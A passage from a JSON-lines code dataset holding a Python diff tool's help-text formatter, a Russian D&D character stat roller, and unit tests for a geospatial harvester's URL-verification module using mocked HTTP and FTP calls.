self.diff_mode == 2:\n text = _helptext2.format(\n file_a=self.file_a,\n color_a=self.color_a,\n file_b=self.file_b,\n color_b=self.color_b,\n color_d=self.color_d,\n color_e=self.color_e,\n color_f=self.color_f,\n w=self.rkc[\"w\"],\n x=self.rkc[\"x\"],\n q=self.rkc[\"q\"],\n a=self.rkc[\"a\"],\n b=self.rkc[\"b\"],\n d=self.rkc[\"d\"],\n e=self.rkc[\"e\"],\n f=self.rkc[\"f\"],\n A=self.rkc[\"a\"] - 32,\n B=self.rkc[\"b\"] - 32,\n D=self.rkc[\"d\"] - 32,\n E=self.rkc[\"e\"] - 32,\n F=self.rkc[\"f\"] - 32,\n m=self.rkc[\"m\"],\n edit_cmd=self.edit_cmd,\n M=self.rkc[\"m\"] - 32,\n j=self.rkc[\"j\"],\n k=self.rkc[\"k\"],\n n=self.rkc[\"n\"],\n p=self.rkc[\"p\"],\n N=self.rkc[\"n\"] - 32,\n P=self.rkc[\"p\"] - 32,\n t=self.rkc[\"t\"],\n z=self.rkc[\"z\"],\n T=self.rkc[\"t\"] - 32,\n Z=self.rkc[\"z\"] - 32,\n s=self.rkc[\"s\"],\n h=self.rkc[\"h\"],\n H=self.rkc[\"h\"] - 32,\n )\n else:\n text = _helptext3.format(\n file_a=self.file_a,\n color_a=self.color_a,\n file_b=self.file_b,\n color_b=self.color_b,\n file_c=self.file_c,\n color_c=self.color_c,\n color_d=self.color_d,\n color_e=self.color_e,\n color_f=self.color_f,\n w=self.rkc[\"w\"],\n x=self.rkc[\"x\"],\n q=self.rkc[\"q\"],\n a=self.rkc[\"a\"],\n b=self.rkc[\"b\"],\n c=self.rkc[\"c\"],\n d=self.rkc[\"d\"],\n e=self.rkc[\"e\"],\n f=self.rkc[\"f\"],\n g=self.rkc[\"g\"],\n A=self.rkc[\"a\"] - 32,\n B=self.rkc[\"b\"] - 32,\n C=self.rkc[\"c\"] - 32,\n D=self.rkc[\"d\"] - 32,\n E=self.rkc[\"e\"] - 32,\n F=self.rkc[\"f\"] - 32,\n G=self.rkc[\"g\"] - 32,\n m=self.rkc[\"m\"],\n edit_cmd=self.edit_cmd,\n M=self.rkc[\"m\"] - 32,\n j=self.rkc[\"j\"],\n k=self.rkc[\"k\"],\n n=self.rkc[\"n\"],\n p=self.rkc[\"p\"],\n N=self.rkc[\"n\"] - 32,\n P=self.rkc[\"p\"] - 32,\n t=self.rkc[\"t\"],\n z=self.rkc[\"z\"],\n T=self.rkc[\"t\"] - 32,\n Z=self.rkc[\"z\"] - 32,\n s=self.rkc[\"s\"],\n h=self.rkc[\"h\"],\n H=self.rkc[\"h\"] - 32,\n )\n return text\n","repo_name":"osamuaoki/imediff","sub_path":"src/imediff/tui.py","file_name":"tui.py","file_ext":"py","file_size_in_byte":37260,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"} +{"seq_id":"74058716890","text":"import random\nfrom racegen import race\n\ndef dice():\n\tx=random.randint(1, 6)\n\ty=random.randint(1, 6)\n\tz=random.randint(1, 6)\n\to=random.randint(1, 6)\n\tstat=[x, y, z, o]\n\tstat.remove(min(stat))\n\tr=sum(stat)\n\treturn r\n\nstre=dice()\nagi=dice()\nstam=dice()\nintel=dice()\nmudr=dice()\nhar=dice()\n\nstats_work=[\nstre,\nagi,\nstam,\nintel,\nmudr,\nhar\n]\n\ndef rand_stat():\n x=int()\n y=int()\n x=random.randint(0, 5)\n y=random.randint(0, 5)\n stats_work[x]+=1\n stats_work[y]+=1\n \nif race=='Лесной гном':\n\tagi+=1\n\tintel+=2\nelif race=='Скальный гном':\n\tstam+=1\n\tintel+=2\nelif race=='Горный дварф':\n\tstam+=2\n\tstre+=2\nelif race=='Холмовой дварф':\n\tstam+=2\n\tmudr+=1\nelif race=='Драконорожденный':\n\tstre+=2\n\thar+=1\nelif race=='Полуорк':\n\tstam+=1\n\tstre+=2\nelif race=='Коренастый полурослик':\n\tagi+=2\n\tstam+=1\nelif race=='Легконогий полурослик':\n\tagi+=2\n\thar+=1\nelif race=='Полуэльф':\n\trand_stat()\nelif race=='Тифлинг':\n\tintel+=1\n\thar+=1\nelif race=='Человек':\n\tstre+=1\n\tagi+=1\n\tstam+=1\n\tintel+=1\n\tmudr+=1\n\thar+=1\nelif race=='Высший эльф':\n\tagi+=2\n\tintel+=1\nelif race=='Лесной эльф':\n\tagi+=2\n\tmudr+=1\nelif race=='Темный 
эльф':\n\tagi+=2\n\thar+=1\n\n\nstats=(\n\"Сила:\"+str(stre)+\"\\n\",\n\"Ловкость:\"+str(agi)+\"\\n\",\n\"Телосложение:\"+str(stam)+\"\\n\",\n\"Интелект:\"+str(intel)+\"\\n\",\n\"Мудрость:\"+str(mudr)+\"\\n\",\n\"Харизма:\"+str(har)+\"\\n\"\n)\n\n\n\n","repo_name":"SatanSVS/DnD_char_gen_bot","sub_path":"statsgen.py","file_name":"statsgen.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19163633229","text":"\"\"\" Test the verification code \"\"\"\n# pylint: disable=protected-access\nimport argparse\nimport io\nimport logging\nimport ftplib\nimport os\nimport os.path\nimport socket\nimport textwrap\nimport unittest\nimport unittest.mock as mock\n\nimport requests.auth\nimport requests.exceptions\nimport requests_oauthlib\n\nimport geospaas_harvesting.verify_urls as verify_urls\n\n\nclass ProviderTestCase(unittest.TestCase):\n \"\"\"Test the Provider base class\"\"\"\n\n def test_instantiation(self):\n \"\"\"Test the setting of the base properties\"\"\"\n name = 'test'\n config = {'foo': 'bar', 'baz': 'qux'}\n provider = verify_urls.Provider(name, config)\n self.assertEqual(provider.name, name)\n self.assertEqual(provider.config, config)\n self.assertIsNone(provider._auth)\n\n def test_equality(self):\n \"\"\"Test the equlity operator between two Provider objects\"\"\"\n self.assertEqual(\n verify_urls.Provider('test', {'foo': 'bar'}),\n verify_urls.Provider('test', {'foo': 'bar'}))\n self.assertNotEqual(\n verify_urls.Provider('test', {'foo': 'bar'}),\n verify_urls.Provider('test2', {'foo': 'bar'}))\n self.assertNotEqual(\n verify_urls.Provider('test', {'foo': 'bar'}),\n verify_urls.Provider('test', {'baz': 'qux'}))\n\n def test_abstract_auth(self):\n \"\"\"The auth property should raise a NotImplementedError\"\"\"\n with self.assertRaises(NotImplementedError):\n verify_urls.Provider('test', {}).auth\n\n def test_abstract_check_url(self):\n \"\"\"The check_url() method should raise a NotImplementedError\"\"\"\n with self.assertRaises(NotImplementedError):\n verify_urls.Provider('test', {}).check_url(mock.Mock())\n\n def test_abstract_check_all_urls(self):\n \"\"\"The check_all_urls() method should raise a NotImplementedError\"\"\"\n with self.assertRaises(NotImplementedError):\n verify_urls.Provider('test', {}).check_all_urls('file')\n\n def test_write_stale_url(self):\n \"\"\"Test writing URL checking information to a file\"\"\"\n with mock.patch('geospaas_harvesting.verify_urls.open') as mock_open:\n mock_file = mock.MagicMock()\n mock_open.return_value.__enter__.return_value = mock_file\n with self.assertLogs(verify_urls.logger, level=logging.DEBUG):\n verify_urls.Provider('test', {}).write_stale_url(\n 'file_name',\n 'absent',\n 518,\n 'http://foo/bar.nc')\n mock_file.write.assert_called_once_with(f\"absent 518 http://foo/bar.nc{os.linesep}\")\n\n\nclass HTTPProviderTestCase(unittest.TestCase):\n \"\"\"Test the HTTPProvider class\"\"\"\n\n def test_instantiation(self):\n \"\"\"Test that the attributes are correctly initialized\"\"\"\n provider = verify_urls.HTTPProvider('test', {'foo': 'bar'})\n self.assertEqual(provider.name, 'test')\n self.assertEqual(provider.config, {'foo': 'bar'})\n self.assertEqual(provider._auth_start, None)\n\n def test_build_oauth2(self):\n \"\"\"Should return an OAuth2 object usable by `requests`\"\"\"\n with mock.patch('requests_oauthlib.OAuth2Session') as mock_oauth2_session:\n self.assertIsInstance(\n verify_urls.HTTPProvider.build_oauth2('user', 
'pass', 'https://foo', 'CLIENT'),\n requests_oauthlib.OAuth2)\n mock_oauth2_session.return_value.fetch_token.assert_called_with(\n token_url='https://foo',\n username='user',\n password='pass',\n client_id='CLIENT'\n )\n\n def test_auth_oauth2(self):\n \"\"\"The auth property should return the right authentication\n object based on the provider attributes\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {\n 'username': 'user',\n 'password': 'pass',\n 'token_url': 'https://foo',\n 'client_id': 'CLIENT'\n })\n\n mock_oauth2 = mock.Mock()\n with mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.build_oauth2',\n return_value=mock_oauth2) as mock_build_oauth2:\n self.assertEqual(\n provider.auth,\n mock_oauth2)\n mock_build_oauth2.assert_called_once_with('user', 'pass', 'https://foo', 'CLIENT')\n\n def test_auth_basic(self):\n \"\"\"The auth property should return the right authentication\n object based on the provider attributes\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {'username': 'user', 'password': 'pass'})\n self.assertEqual(\n provider.auth,\n requests.auth.HTTPBasicAuth('user', 'pass'))\n\n def test_auth_no_auth(self):\n \"\"\"The auth property should return None when no authentication\n method can be determined\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n self.assertIsNone(provider.auth)\n\n def test_auth_renew(self):\n \"\"\"Test that authentication is renewed when necessary\"\"\"\n provider = verify_urls.HTTPProvider('test', {\n 'username': 'user',\n 'password': 'pass',\n 'token_url': 'token',\n 'client_id': 'ID',\n 'auth_renew': 1\n })\n\n with mock.patch('time.monotonic', side_effect=(1, 2, 2.1)), \\\n mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.build_oauth2',\n side_effect=('auth1', 'auth2', 'auth3')):\n # First call -> first return value from build_oauth2()\n self.assertEqual(provider.auth, 'auth1')\n # Second call, one second later -> second return value from build_oauth2()\n self.assertEqual(provider.auth, 'auth2')\n # Third call, less than one second later -> the value does not change\n self.assertEqual(provider.auth, 'auth2')\n\n def test_check_url_200(self):\n \"\"\"Should send a HEAD request to the URL and return whether the\n URL is valid or not.\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_response = mock.MagicMock(status_code=200, headers={})\n with mock.patch('geospaas_harvesting.utils.http_request', return_value=mock_response):\n self.assertEqual(provider.check_url(mock_dataset_uri), verify_urls.PRESENT)\n\n def test_check_url_404(self):\n \"\"\"Should send a HEAD request to the URL and return\n verify_urls.ABSENT if a 404 error is received\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_response = mock.MagicMock(status_code=404, headers={})\n with mock.patch('geospaas_harvesting.utils.http_request',\n return_value=mock_response) as mock_request:\n self.assertEqual(provider.check_url(mock_dataset_uri), verify_urls.ABSENT)\n mock_request.assert_called_once()\n\n def test_check_url_http_error(self):\n \"\"\"Should send a HEAD request to the URL and return\n 'http_' if an error code other than 404 is received\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_response = mock.MagicMock(status_code=503, headers={})\n with mock.patch('geospaas_harvesting.utils.http_request',\n 
return_value=mock_response) as mock_request:\n self.assertEqual(provider.check_url(mock_dataset_uri), 'http_503')\n mock_request.assert_called_once()\n\n def test_check_url_429_no_header(self):\n \"\"\"When an error 429 occurs, the URL should ne retried after a\n delay\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_responses = (\n mock.MagicMock(status_code=429, headers={}),\n mock.MagicMock(status_code=404, headers={})\n )\n with mock.patch('geospaas_harvesting.utils.http_request',\n side_effect=mock_responses) as mock_request, \\\n mock.patch('time.sleep') as mock_sleep:\n\n with self.assertLogs(verify_urls.logger, level=logging.WARNING):\n self.assertEqual(provider.check_url(mock_dataset_uri),verify_urls.ABSENT)\n\n self.assertEqual(mock_request.call_count, 2)\n self.assertListEqual(mock_sleep.call_args_list, [mock.call(60), mock.call(0)])\n\n def test_check_url_429_retry_after_header(self):\n \"\"\"When an error 429 occurs, the URL should be retried after a\n delay\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {'throttle': 1})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_responses = (\n mock.MagicMock(status_code=429, headers={'Retry-After': 2}),\n mock.MagicMock(status_code=200, headers={})\n )\n with mock.patch('geospaas_harvesting.utils.http_request',\n side_effect=mock_responses) as mock_request, \\\n mock.patch('time.sleep') as mock_sleep:\n\n with self.assertLogs(verify_urls.logger, level=logging.WARNING):\n self.assertEqual(\n provider.check_url(mock_dataset_uri),\n verify_urls.PRESENT)\n\n self.assertEqual(mock_request.call_count, 2)\n self.assertListEqual(mock_sleep.call_args_list, [mock.call(2), mock.call(1)])\n\n def test_check_url_429_too_many_retries(self):\n \"\"\"When there are too many retries, an exception should be\n raised\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n mock_responses = (\n mock.MagicMock(status_code=429, headers={}),\n mock.MagicMock(status_code=200, headers={})\n )\n with mock.patch('geospaas_harvesting.utils.http_request',\n side_effect=mock_responses) as mock_request:\n\n with self.assertRaises(verify_urls.TooManyRequests):\n provider.check_url(mock_dataset_uri, tries=1)\n mock_request.assert_called_once()\n\n def test_check_url_connection_error_retry(self):\n \"\"\"The request should be retried if a ConnectionError occurs\"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n with mock.patch('geospaas_harvesting.utils.http_request') as mock_request, \\\n mock.patch('time.sleep') as mock_sleep:\n mock_request.side_effect = (\n requests.exceptions.ConnectionError,\n requests.exceptions.ConnectionError,\n mock.MagicMock(status_code=200, headers={})\n )\n with self.assertLogs(verify_urls.logger, level=logging.ERROR):\n provider.check_url(mock_dataset_uri, tries=5)\n\n self.assertListEqual(mock_sleep.call_args_list, [mock.call(5), mock.call(5), mock.call(0)])\n\n def test_check_url_connection_error_too_many_retries(self):\n \"\"\"The request should be retried if a ConnectionError occurs\n and the exception should be raised if the retry limit is\n reached\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_dataset_uri = mock.Mock(id=1, uri='https://foo')\n with mock.patch('geospaas_harvesting.utils.http_request') as mock_request, \\\n mock.patch('time.sleep') as mock_sleep:\n mock_request.side_effect = (\n 
requests.exceptions.ConnectionError,\n requests.exceptions.ConnectionError,\n )\n with self.assertLogs(verify_urls.logger, level=logging.ERROR), \\\n self.assertRaises(requests.exceptions.ConnectionError):\n provider.check_url(mock_dataset_uri, tries=2)\n\n self.assertListEqual(mock_sleep.call_args_list, [mock.call(5)])\n\n def test_check_and_write_stale_url_valid(self):\n \"\"\"Should not write anything to the output file if the URL is\n valid\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n mock_lock = mock.MagicMock()\n with mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.check_url',\n return_value=verify_urls.PRESENT), \\\n mock.patch('geospaas_harvesting.verify_urls.open') as mock_open:\n provider.check_and_write_stale_url(mock_lock, 'output.txt', mock.Mock())\n mock_open.assert_not_called()\n\n def test_check_and_write_stale_url_invalid(self):\n \"\"\"Should write the URL info to the output file if the URL is\n invalid\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {})\n with mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.check_url',\n return_value=verify_urls.ABSENT), \\\n mock.patch('geospaas_harvesting.verify_urls.open') as mock_open:\n mock_file = mock.MagicMock()\n mock_open.return_value.__enter__.return_value = mock_file\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.id = 1\n mock_dataset_uri.uri = 'https://foo'\n provider.check_and_write_stale_url(mock.MagicMock(), 'output.txt', mock_dataset_uri)\n mock_file.write.assert_called_once_with(\n f\"{verify_urls.ABSENT} 1 https://foo{os.linesep}\")\n\n def test_check_all_urls(self):\n \"\"\"Should check all the URLs for one provider\"\"\"\n mock_lock = mock.Mock()\n with mock.patch('geospaas_harvesting.verify_urls.Lock', return_value=mock_lock), \\\n mock.patch(\n 'geospaas_harvesting.verify_urls.BoundedThreadPoolExecutor') as mock_pool, \\\n mock.patch('geospaas_harvesting.verify_urls.DatasetURI.objects') as mock_manager, \\\n mock.patch('concurrent.futures.as_completed'), \\\n mock.patch('geospaas_harvesting.verify_urls.HTTPProvider'\n '.check_and_write_stale_url') as mock_write:\n mock_executor = mock_pool.return_value.__enter__.return_value\n mock_dataset_uri = mock.Mock()\n mock_manager.filter.return_value.iterator.return_value = [mock_dataset_uri]\n\n # call without throttle: 50 workers\n provider = verify_urls.HTTPProvider('test', {'url': 'https://foo/'})\n with self.assertLogs(verify_urls.logger, level=logging.INFO):\n provider.check_all_urls('output.txt')\n\n mock_executor.submit.assert_called_once_with(\n mock_write, mock_lock, 'output.txt', mock_dataset_uri)\n mock_pool.assert_called_once_with(max_workers=50, queue_limit=2000)\n\n mock_pool.reset_mock()\n\n # call with throttle: 1 worker\n provider = verify_urls.HTTPProvider('test', {'url': 'https://foo/', 'throttle': 1})\n with self.assertLogs(verify_urls.logger, level=logging.INFO):\n provider.check_all_urls('output.txt')\n mock_executor.submit.assert_called_once_with(\n mock_write, mock_lock, 'output.txt', mock_dataset_uri)\n mock_pool.assert_called_once_with(max_workers=1, queue_limit=2000)\n\n mock_pool.reset_mock()\n\n def test_check_all_urls_thread_error(self):\n \"\"\"Exceptions happening in the threads should be raised in the\n main thread\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {'url': 'https://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.HTTPProvider'\n '.check_and_write_stale_url') as mock_write, \\\n mock.patch('geospaas_harvesting.verify_urls.DatasetURI.objects') as mock_manager:\n 
mock_write.side_effect = ValueError\n mock_manager.filter.return_value.iterator.return_value = [mock.Mock()]\n with self.assertRaises(ValueError), \\\n self.assertLogs(verify_urls.logger, level=logging.INFO):\n provider.check_all_urls('out.txt')\n\n\nclass FTPProviderTestCase(unittest.TestCase):\n \"\"\"Test the FTPProvider class\"\"\"\n\n def test_instantiation(self):\n \"\"\"Test that the attributes are correctly initialized\"\"\"\n provider = verify_urls.FTPProvider('test', {'foo': 'bar'})\n self.assertEqual(provider.name, 'test')\n self.assertEqual(provider.config, {'foo': 'bar'})\n self.assertEqual(provider._ftp_client, None)\n\n def test_auth(self):\n \"\"\"Test that the auth property returns a dictionary of\n arguments for ftplib.FTP.login() if the necessary information\n is provided\n \"\"\"\n # No authentication\n provider = verify_urls.FTPProvider('test', {})\n self.assertEqual(provider.auth, {'user': '', 'passwd': ''})\n\n # Authentication info provided\n provider = verify_urls.FTPProvider('test', {'username': 'user', 'password': 'pass'})\n provider_auth = provider.auth\n self.assertEqual(provider_auth, {'user': 'user', 'passwd': 'pass'})\n\n # Return existing auth\n self.assertIs(provider.auth, provider_auth)\n\n def test_ftp_client(self):\n \"\"\"Test that an FTP client is provided by the ftp_client property\"\"\"\n provider = verify_urls.FTPProvider('test', {})\n with mock.patch.object(provider, 'ftp_connect') as mock_ftp_connect:\n ftp_client = provider.ftp_client\n self.assertIsInstance(provider.ftp_client, ftplib.FTP)\n mock_ftp_connect.assert_called_once()\n\n mock_ftp_connect.reset_mock()\n\n # Check that the client is re-used on following calls\n self.assertIs(provider.ftp_client, ftp_client)\n mock_ftp_connect.assert_not_called()\n\n def test_ftp_connect(self):\n \"\"\"Test FTP connection in a standard case\"\"\"\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client:\n provider.ftp_connect()\n mock_ftp_client.return_value.connect.assert_called_with('foo', timeout=5)\n mock_ftp_client.return_value.login.assert_called_with(user='', passwd='')\n\n def test_ftp_connect_with_auth(self):\n \"\"\"Test FTP connection with authentication\"\"\"\n provider = verify_urls.FTPProvider('test', {\n 'url': 'ftp://foo',\n 'username': 'user',\n 'password': 'pass'\n })\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client:\n provider.ftp_connect()\n mock_ftp_client.return_value.connect.assert_called_with('foo', timeout=5)\n mock_ftp_client.return_value.login.assert_called_with(user='user', passwd='pass')\n\n def test_ftp_connect_ok_after_retry(self):\n \"\"\"Test FTP connection with retries, successful in the end\"\"\"\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client, \\\n mock.patch('time.sleep') as mock_sleep:\n mock_ftp_client.return_value.connect.side_effect = (socket.timeout(),) * 3 + ('220',)\n\n provider.ftp_connect()\n\n mock_ftp_client.return_value.connect.assert_called_with('foo', timeout=5)\n self.assertEqual(mock_ftp_client.return_value.connect.call_count, 4)\n\n mock_ftp_client.return_value.login.assert_called_once_with(user='', passwd='')\n\n self.assertListEqual(\n mock_sleep.call_args_list,\n [mock.call(5), 
mock.call(6), mock.call(7)])\n\n def test_ftp_connect_failing_after_retry(self):\n \"\"\"Test FTP connection with retries, failing in the end\"\"\"\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client, \\\n mock.patch('time.sleep') as mock_sleep:\n mock_ftp_client.return_value.connect.side_effect = socket.timeout\n\n with self.assertRaises(socket.timeout), \\\n self.assertLogs(verify_urls.logger, level=logging.ERROR):\n provider.ftp_connect()\n\n self.assertEqual(mock_ftp_client.return_value.connect.call_count, 5)\n mock_ftp_client.return_value.login.assert_not_called()\n self.assertListEqual(\n mock_sleep.call_args_list,\n [mock.call(5), mock.call(6), mock.call(7), mock.call(8)])\n\n def test_check_url_present(self):\n \"\"\"Test checking a URL that points to an existing file\"\"\"\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.uri = 'ftp://foo/bar/baz.nc'\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client:\n\n mock_ftp_client.return_value.nlst.return_value = ['/bar/baz.nc']\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n\n self.assertEqual(\n provider.check_url(mock_dataset_uri),\n verify_urls.PRESENT)\n\n def test_check_url_absent(self):\n \"\"\"Test checking a URL that points to an non-existing file\"\"\"\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.uri = 'ftp://foo/bar/baz.nc'\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client:\n\n mock_ftp_client.return_value.nlst.return_value = []\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n\n self.assertEqual(\n provider.check_url(mock_dataset_uri),\n verify_urls.ABSENT)\n\n def test_check_url_ok_after_retries(self):\n \"\"\"Test checking a URL successfully after some retries\"\"\"\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.uri = 'ftp://foo/bar/baz.nc'\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client, \\\n mock.patch('time.sleep') as mock_sleep:\n\n mock_ftp_client.return_value.nlst.side_effect = (\n (ConnectionResetError,) * 3 + (verify_urls.ABSENT,))\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n\n self.assertEqual(\n provider.check_url(mock_dataset_uri),\n verify_urls.ABSENT)\n\n self.assertEqual(mock_ftp_client.return_value.nlst.call_count, 4)\n self.assertEqual(mock_ftp_client.return_value.connect.call_count, 3)\n self.assertEqual(mock_sleep.call_count, 3)\n\n def test_check_url_failing_after_retries(self):\n \"\"\"Test when checking a URL fails after retries\"\"\"\n mock_dataset_uri = mock.Mock()\n mock_dataset_uri.uri = 'ftp://foo/bar/baz.nc'\n with mock.patch('geospaas_harvesting.verify_urls.FTPProvider.ftp_client',\n new_callable=mock.PropertyMock) as mock_ftp_client, \\\n mock.patch('time.sleep') as mock_sleep:\n\n mock_ftp_client.return_value.nlst.side_effect = ConnectionResetError\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n\n with self.assertRaises(ConnectionResetError), \\\n self.assertLogs(verify_urls.logger, level=logging.ERROR):\n provider.check_url(mock_dataset_uri)\n\n self.assertEqual(mock_ftp_client.return_value.nlst.call_count, 5)\n self.assertEqual(mock_ftp_client.return_value.connect.call_count, 4)\n self.assertEqual(mock_sleep.call_count, 
4)\n\n def test_check_all_urls(self):\n \"\"\"Test that the right URLs are written to the output file\"\"\"\n provider = verify_urls.FTPProvider('test', {'url': 'ftp://foo'})\n with mock.patch('geospaas_harvesting.verify_urls.DatasetURI.objects') as mock_manager, \\\n mock.patch.object(provider, 'check_url') as mock_check_url, \\\n mock.patch.object(provider, 'write_stale_url') as mock_write:\n\n mock_manager.filter.return_value.iterator.return_value = iter([\n mock.Mock(id=1, uri='ftp://foo/bar/baz1.nc'),\n mock.Mock(id=2, uri='ftp://foo/bar/baz2.nc'),\n mock.Mock(id=3, uri='ftp://foo/bar/baz3.nc'),\n ])\n\n mock_check_url.side_effect = (verify_urls.ABSENT, verify_urls.PRESENT, 'http_503')\n\n with self.assertLogs(verify_urls.logger):\n provider.check_all_urls('output.txt')\n\n self.assertListEqual(mock_write.call_args_list, [\n mock.call('output.txt', verify_urls.ABSENT, 1, 'ftp://foo/bar/baz1.nc'),\n mock.call('output.txt', 'http_503', 3, 'ftp://foo/bar/baz3.nc'),\n ])\n\n\nclass VerifyURLsTestCase(unittest.TestCase):\n \"\"\"Test the URLs verification module\"\"\"\n\n def test_main_check(self):\n \"\"\"The correct actions should be launched depending on the CLI\n arguments\n \"\"\"\n args = mock.Mock()\n args.action = 'check'\n with mock.patch('geospaas_harvesting.verify_urls.parse_cli_arguments', return_value=args), \\\n mock.patch('geospaas_harvesting.verify_urls.read_config'), \\\n mock.patch('geospaas_harvesting.verify_urls.check_providers') as mock_check, \\\n mock.patch('geospaas_harvesting.verify_urls.delete_stale_urls') as mock_delete:\n\n with self.assertLogs(verify_urls.logger):\n verify_urls.main()\n mock_check.assert_called_once()\n mock_delete.assert_not_called()\n\n def test_main_delete(self):\n \"\"\"Test that the delete_stale_urls() function is called when\n the 'delete-stale' argument is given on the CLI\n \"\"\"\n args = mock.Mock()\n args.action = 'delete-stale'\n with mock.patch('geospaas_harvesting.verify_urls.parse_cli_arguments', return_value=args), \\\n mock.patch('geospaas_harvesting.verify_urls.read_config'), \\\n mock.patch('geospaas_harvesting.verify_urls.check_providers') as mock_check, \\\n mock.patch('geospaas_harvesting.verify_urls.delete_stale_urls') as mock_delete:\n\n with self.assertLogs(verify_urls.logger):\n verify_urls.main()\n mock_check.assert_not_called()\n mock_delete.assert_called_once()\n\n def test_parse_cli_arguments_check(self):\n \"\"\"Test CLI arguments parsing for the check action\"\"\"\n with mock.patch('sys.argv',\n ['verify_urls.py', '-p', '/foo.yml', 'check', '-o', '/bar']):\n self.assertEqual(\n verify_urls.parse_cli_arguments(),\n argparse.Namespace(\n providers_conf='/foo.yml', action='check', output_directory='/bar'))\n\n def test_parse_cli_arguments_check_defaults(self):\n \"\"\"Test CLI arguments parsing for the check action with default\n values\n \"\"\"\n default_provider_conf = os.path.join(os.path.dirname(verify_urls.__file__), 'check.yml')\n with mock.patch('sys.argv', ['verify_urls.py', 'check']):\n self.assertEqual(\n verify_urls.parse_cli_arguments(),\n argparse.Namespace(\n providers_conf=default_provider_conf, action='check', output_directory='.'))\n\n def test_parse_cli_arguments_delete(self):\n \"\"\"Test CLI arguments parsing for the delete action\"\"\"\n with mock.patch('sys.argv',\n ['verify_urls.py', '-p', '/foo.yml', 'delete-stale', '/bar/baz.txt']):\n self.assertEqual(\n verify_urls.parse_cli_arguments(),\n argparse.Namespace(\n providers_conf='/foo.yml',\n action='delete-stale',\n 
urls_file='/bar/baz.txt',\n force=False))\n\n def test_parse_cli_arguments_delete_force(self):\n \"\"\"Test CLI arguments parsing for the delete action with the force option\"\"\"\n with mock.patch('sys.argv',\n ['verify_urls.py', '-p', '/foo.yml', 'delete-stale', '/bar/baz.txt', '-f']):\n self.assertEqual(\n verify_urls.parse_cli_arguments(),\n argparse.Namespace(\n providers_conf='/foo.yml',\n action='delete-stale',\n urls_file='/bar/baz.txt',\n force=True))\n\n def test_parse_cli_arguments_no_action(self):\n \"\"\"An error should be raised if no action is specified in the\n CLI arguments\n \"\"\"\n buffer = io.StringIO()\n with mock.patch('sys.argv', ['verify_urls.py']), \\\n mock.patch('sys.stderr', buffer), \\\n self.assertRaises(SystemExit):\n verify_urls.parse_cli_arguments()\n self.assertIn(\n 'the following arguments are required: action',\n buffer.getvalue())\n\n def test_parse_cli_arguments_check_wrong_arg(self):\n \"\"\"An error should be raised if the wrong argument is provided\n to the check action\n \"\"\"\n buffer = io.StringIO()\n with mock.patch('sys.argv', ['verify_urls.py', 'check', '-f']), \\\n mock.patch('sys.stderr', buffer), \\\n self.assertRaises(SystemExit):\n verify_urls.parse_cli_arguments()\n self.assertIn('unrecognized arguments: -f', buffer.getvalue())\n\n def test_parse_cli_arguments_delete_wrong_arg(self):\n \"\"\"An error should be raised if the wrong argument is provided\n to the delete action\n \"\"\"\n buffer = io.StringIO()\n with mock.patch('sys.argv', ['verify_urls.py', 'delete-stale', '-o', '/bar']), \\\n mock.patch('sys.stderr', buffer), \\\n self.assertRaises(SystemExit):\n verify_urls.parse_cli_arguments()\n self.assertIn('unrecognized arguments: -o', buffer.getvalue())\n\n def test_delete_stale_urls(self):\n \"\"\"404 URLs should be deleted unless the force option is used\n \"\"\"\n provider = verify_urls.HTTPProvider('test', {\n 